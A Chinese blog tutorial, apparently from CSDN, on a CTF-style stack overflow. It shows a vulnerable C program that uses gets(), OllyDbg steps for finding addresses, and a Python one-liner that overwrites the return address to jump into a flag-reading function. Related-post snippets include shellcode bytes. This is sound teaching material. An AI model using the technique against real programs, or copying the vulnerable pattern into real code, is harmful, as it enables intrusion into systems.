栈溢出覆盖返回地址

最新推荐文章于 2024-05-17 08:45:00 发布
最新推荐文章于 2024-05-17 08:45:00 发布
阅读量2.2k 收藏 5
点赞数 4
分类专栏: hack
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012319493/article/details/90552982
版权

函数的调用过程:如果 A() 调用 B(),A() 先将 B() 的参数逆序压栈,然后将调用完 B() 后的下一条指令的地址 EIP 压栈。进入 B() 后,B() 先将 A() 的栈底 EBP 压栈,然后建立自己的栈。B() 结束后,可将 A() 的 EBP 弹出,恢复 A() 的栈底,然后弹出 A() 的下一条指令地址 EIP,A() 得以继续执行。

OllyDbg 用法:

  • F2 断点
  • F9 跳到断点
  • F7 单步执行,进入函数内部
  • F8 单步执行,跳过函数

比赛中不会给出源码:

#include<stdio.h>
#include<stdlib.h>

int stack_over_flow()
{
		char Password[16] = { 0, };
		gets(Password);
		return 0;
}
void readfile()
{
		FILE* fp;
		char FileStr[20] = { 0, };
		printf("You've got the flag:\n");
		if (fp = fopen("flag.txt", "r"))
		{
			fgets(FileStr, 48, fp);
			printf("%s\n", FileStr);
			fclose(fp);
		}
		else
			printf("File error!\n");
		exit(0);
}
int main()
{
		printf("Welcome!\n");
		printf("Please input your password(within 8 characters):\n");
		stack_over_flow();
		printf("Good Bye!\n");
		return 0;
}

漏洞在函数 stack_over_flow()的 gets()函数中,缓冲区只有 16 个字节,如果输入长度大于 16,将覆盖很多重要数据包括 stack_over_flow()函数的返回地址(需要学习栈相关内容)。远程服务器运行的例程的目录下有一个 flag.txt 文件,存放 flag,而程序中已经写好了读取的代码 readfile()但并没有被调用。我们通过缓冲区溢出覆盖到 stack_over_flow()函数的返回地址,让其返回到 readfile()就可以拿到 flag。

先用 IDA 按 F5 查看反编译。

用 OllyDBG 打开编译后的 c.exe:
在这里插入图片描述
F7 进入 CALL c.00401014

在这里插入图片描述
F8 继续
在这里插入图片描述
进入到 main() ,入口地址是 0x00401180

F8 一直到达 CALL c.0x0040100A 行后,F7 进入

在这里插入图片描述
在这里插入图片描述
双击 JMP c.readfile,查看 readfile() 的入口地址为:0x004010A0

继续 F8
在这里插入图片描述
进入到 stack_over_flow() ,入口地址是 0x00401040

F8 到 CALL c.gets,输入 8 个 ‘A’(16 进制为 0x41),栈为:
在这里插入图片描述
20 个字节中:

以下 16 字节为栈空间:
41414141
41414141
00000000
00000000

0019FF40 为之前保存的 ebp

004011B7 为函数的返回地址

可以输入 20 个 A,然后用 readfile() 的入口地址覆盖返回地址 004011B7,这样当程序返回时就从栈中取出 readfile() 的入口地址作为 EIP 寄存器的内容,于是程序跳到了 EIP 处,读取文件显示 flag。

在这里插入图片描述
找到 readfile() ,其入口地址,是 0x004010A0

可借助 Python 输出重定向输入一些不能从键盘打印出的字符:

python -c "print 'A'*20+'\xA0'+'\x10'+'\x40'+'\x00'" | C:\Users\yjp\Desktop\c\Debug\c.exe
  • 管道符号:| 用来把 Python 输出重定向到 c.exe 的输入。
  • 20 个 A:填充栈内空间。
  • 004010A0:readfile() 的入口地址。因为是 16 进制,所以有 ‘\x’,intel CPU 采用小端序,填的位置正好位于 stack_over_flow() 的返回地址处,相当于修改了这一地址。

在这里插入图片描述
由于没有写 flag.txt,所以会出现 File error!

参考
天枢 CTF-PWN 入门指导与学习路线
浅析函数调用栈 https://www.cnblogs.com/damumu/p/7320418.html

谛听-
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
c++堆栈溢出怎么解决_栈溢出基础
weixin_39610422的博客
11-23 3339
一. 基础知识什么是缓冲区溢出在深入探讨技术之前, 让我们先了解一下缓冲区溢出的实际内容.想象一个非常简单的程序, 要求你输入你的用户名, 然后返回到它在做什么.从视觉上看, 如下所示注意到括号之间的空格是输入用户名的预期空间.那个空间是我们的缓冲.处理用户名后, 返回地址将告知程序需要执行的下一个指令.现在, 如果我们不仅输入用户名, 而且添加其他数据以溢出此缓冲区空间, 发生什么情况?不仅如...
栈溢出覆盖返回地址实践
ChuMeng1999的博客
01-10 1049
目录预备知识1.关于栈溢出的一些基础知识2.对“栈”简单介绍实验目的实验环境实验步骤一使用Olldbg动态调试程序,观察栈溢出的过程实验步骤二 预备知识 1.关于栈溢出的一些基础知识 如果你关注网络安全,那么你一定听说过缓冲区溢出。简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据撑爆了小缓冲区,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,本质都是一样的。 2.对“栈”简单介绍 从计算机科学的角度讲,栈指的是一种数据结构,是一种先进后出的数据表。
栈溢出笔记1.2 覆盖EIP
hustd10的博客
04-09 4811
1.1节我们说到可以利用栈溢出来破坏栈原有的内容,这一节,我们就来看看如何争夺到返回地址(EIP),使得我们可以随意控制它的值,这样我们就可以控制程序。来看一个经典的程序:这个程序的get_print函数定义了一个大小为11个字节的数组,正常情况下我们的输入应该最多为10个字符(还有一个\0结束符),而gets函数没有明确定义输入的大小,因此,我们可以输入超过10个字符,从而造成栈溢出。如下
pwn基础入门-2
最新发布
weixin_49765221的博客
05-17 940
275,最上面的一行显示了rip在main函数当,我的格式没有变,这里就不改变/.gdbinit的内容了。一般一个指令后面加一个数或者两个数,一个的就是一个操作指令一个操作数,两个的就是一个操作指令,一个目的操作数,一个是源操作数。输入si,可以看到进入到了put函数,再次disassemble $rip,可以查看到的内容是put函数的。两者的区别在于:cmp减完以后不赋值,sub减完以后赋值给al,cmp不存储,是用来和下面的jne进行对比的。等于0的时候,就执行func的函数。
数据离奇消失bug------栈覆盖
G_Super_Mouse的博客
01-20 306
* 工作遇到的bug,当时写了一块内存后,其他内存的数据消失了,百思不得其解,后来想到是栈内存覆盖,一看还真是。于是就有了这篇文章。 * 在通过栈申请的内存有一个特点,他是连续的,这就很容易造成一个现象,如果出现栈溢出问题,覆盖写掉其他变量的东西。比如我下面写的例子。 ```c #include <stdio.h> #include <stdlib.h> #include <string.h> char bigmem[50] = {0}; void mai
栈溢出覆盖函数返回地址
iczfy585的博客
10-18 3214
栈溢出覆盖函数返回地址原理利用 原理 栈溢出栈溢出就是栈上的缓冲区填入过多的数据,超出了边界,从而导致了栈上原有数据被覆盖。 函数调用的时候,开辟一个栈帧结构。首先将调用的函数的参数入栈,然后依次压入调用函数的返回地址和当前栈底指针寄存器(BP)的值入栈。其压入返回地址是通过call指令来实现的。 在函数调用结束的时候,将栈指针SP重新指向帧指针BP的位置,并弹出BP和返回地址IP。这样函数状态将恢复成进入子函数的状态,实现了函数栈的切换。 当用call指令调用一个函数的时候,首先将IP寄存
Windows漏洞利用开发系列教程第二部分:栈溢出覆盖返回地址
01-11
翻过国外的一个二进制漏洞学习教程, 非常适合刚学习漏洞的新人。
栈溢出之构造函数覆盖返回地址
iczfy585的博客
10-20 752
栈溢出利用已知函数覆盖返回地址 题目:攻防世界 level2 查看文件的保护,发现没有栈哨,可以考虑覆盖返回地址。 利用IDA进行静态分析,找到vulnerable_function()函数 ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] system("echo Input:"); return read(0, &buf, 0x100u); } read函数读入了0x100的大小到缓冲区,但是缓冲区只
pwn刷题num16----寻找地址间距,栈溢出覆盖返回地址
tbsqigongzi的博客
04-23 798
攻防世界pwn进阶区stack2 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位,小端序 开启部分RELRO---got表仍可写 开启canary保护---栈溢出需绕过canary 开启NX保护----堆栈不可执行 未开启PIE----程序地址为真实地址 动态链接 运行程序,先输入数字总量,之后输入数字,有一个菜单栏,分别实现对数字展示,添加,改变,取平均值,和退出程序五种功能。 ida看一下主函数 观察主函数,发现一处溢出数组越界漏洞,v5没有限制大小,使得
从零开始学习软件漏洞挖掘系列教程第二篇:栈溢出覆盖返回地址实践.pdf
01-31
漏洞挖掘实验类教学教程,通过调试一个有漏洞的程序,理解栈溢出的成因并学利用栈溢出漏洞的方法,漏洞挖掘实验类教学教程,通过调试一个有漏洞的程序,理解栈溢出的成因并学利用栈溢出漏洞的方法
栈溢出crash小合集
11-15
这种情况下,超出边界的数据覆盖栈上的其他变量,包括返回地址。攻击者可以利用这一点,篡改返回地址,使得程序在执行完预期功能后跳转到恶意代码的位置,从而实现远程代码执行或提升权限等目的。 AFL是一种流行...
栈溢出漏洞
03-30
在“湖湘杯2016网络安全技能大赛pwnme”这个挑战,参赛者可能需要理解栈溢出的工作原理,分析提供的程序代码,寻找可能的溢出点,然后构造特定的输入数据来覆盖返回地址,实现控制程序执行流程的目的。这需要扎实...
缓冲区溢出——栈溢出
08-04
1. **返回导向编程(Return-Oriented Programming, ROP)**:攻击者通过栈溢出覆盖返回地址,使其指向一系列短小的指令片段(称为 gadgets),组合起来执行任意代码。 2. **堆栈pivot**:改变栈的布局,使得溢出的...
漏洞利用—栈溢出
谈成(C/C++)
04-28 452
下面的代码可以在xp sp3系统上运行测试: int vulnfun(char* str) { char stack[10]; strcpy(stack, str); return 0; } int main() { unsigned char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\
ch2:栈溢出,修改邻接变量,修改函数返回地址
1ame的博客
10-23 1882
实验环境: 操作系统 Windows7 IDE VC 6.0 build版本 debug 用于实验的C语言代码: #include #define PASSWORD "1234567" int verify_password(char * password) { int authenticated; //add loc
溢出覆盖返回地址实现攻击
九层台
08-26 2575
都知道call语句分2步 1.把返回地址放入堆栈 2.跳转到call的地址 如果这个返回地址覆盖成我们想要执行的函数的地址结果是不是很有趣 O(∩_∩)O 思路很见到,找到我们需要的地址然后覆盖原来的返回地址就行了 下面就讲一些实现的细节 #include   void win() {     printf("Congratulations, you pwned
逆向分析-栈溢出原理与实践(修改函数返回地址
weixin_57421069的博客
10-20 716
0day安全:软件漏洞分析技术,栈溢出原理与实践,改写邻接变量的方法是很有用的,但这种漏洞利用对代码环境的要求相对比较苛刻。更通用、更强大的攻击通过缓冲区溢出改写的目标往往不是某一个变量,而是瞄准栈帧最下方的 EBP 和函数返回地址等栈帧状态值
栈溢出实践
IDoubleTong的博客
02-21 372
实验代码 实验环境为Win10,编译工具为VS2017(Release)。 #define _CRT_SECURE_NO_WARNINGS #include &amp;amp;amp;lt;Windows.h&amp;amp;amp;gt; #include &amp;amp;amp;lt;stdio.h&amp;amp;amp;gt; #include &amp;amp;amp;lt;string.h&amp;amp;amp;gt; #def
栈的覆盖
Conan
06-16 654
同一线程使用同一个栈,因而函数调用的时候往往对栈进行覆盖使用,加入函数返回的是指针,可能就有预料不到的结果。 #include int* get() { int i = 0x12345678; return &i; } int main() { int* p = get(); printf("%x\n",*p );//printf后修改了栈i的地址的内容 printf("
栈溢出、整型溢出、UAF溢出、覆盖返回地址覆盖函数指针、覆盖SEH、格式化字符串溢出、栈溢出利用
10-17
这些都是常见的漏洞类型,其栈溢出、整型溢出、UAF溢出、覆盖返回地址、格式化字符串溢出是比较常见的。栈溢出利用和覆盖函数指针、覆盖SEH则需要具体情况具体分析。 栈溢出:当程序向栈写入超过其分配的空间时,就发生栈溢出。攻击者可以利用这个漏洞来覆盖返回地址,从而控制程序流程。 整型溢出:当程序使用一个整数类型的变量来存储一个超过其范围的值时,就发生整型溢出。攻击者可以利用这个漏洞来绕过一些安全检查,比如数组边界检查。 UAF溢出:当程序使用一个已经被释放的内存块时,就发生UAF(Use After Free)漏洞。攻击者可以利用这个漏洞来执行任意代码。 覆盖返回地址:当程序在函数调用时,将返回地址保存在栈。攻击者可以通过覆盖返回地址来控制程序流程。 覆盖函数指针:当程序使用函数指针时,攻击者可以通过覆盖函数指针来控制程序流程。 覆盖SEH:当程序在发生异常时,调用SEH(Structured Exception Handling)来处理异常。攻击者可以通过覆盖SEH来控制程序流程。 格式化字符串溢出:当程序使用不安全的格式化字符串函数时,攻击者可以通过构造恶意格式化字符串来执行任意代码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值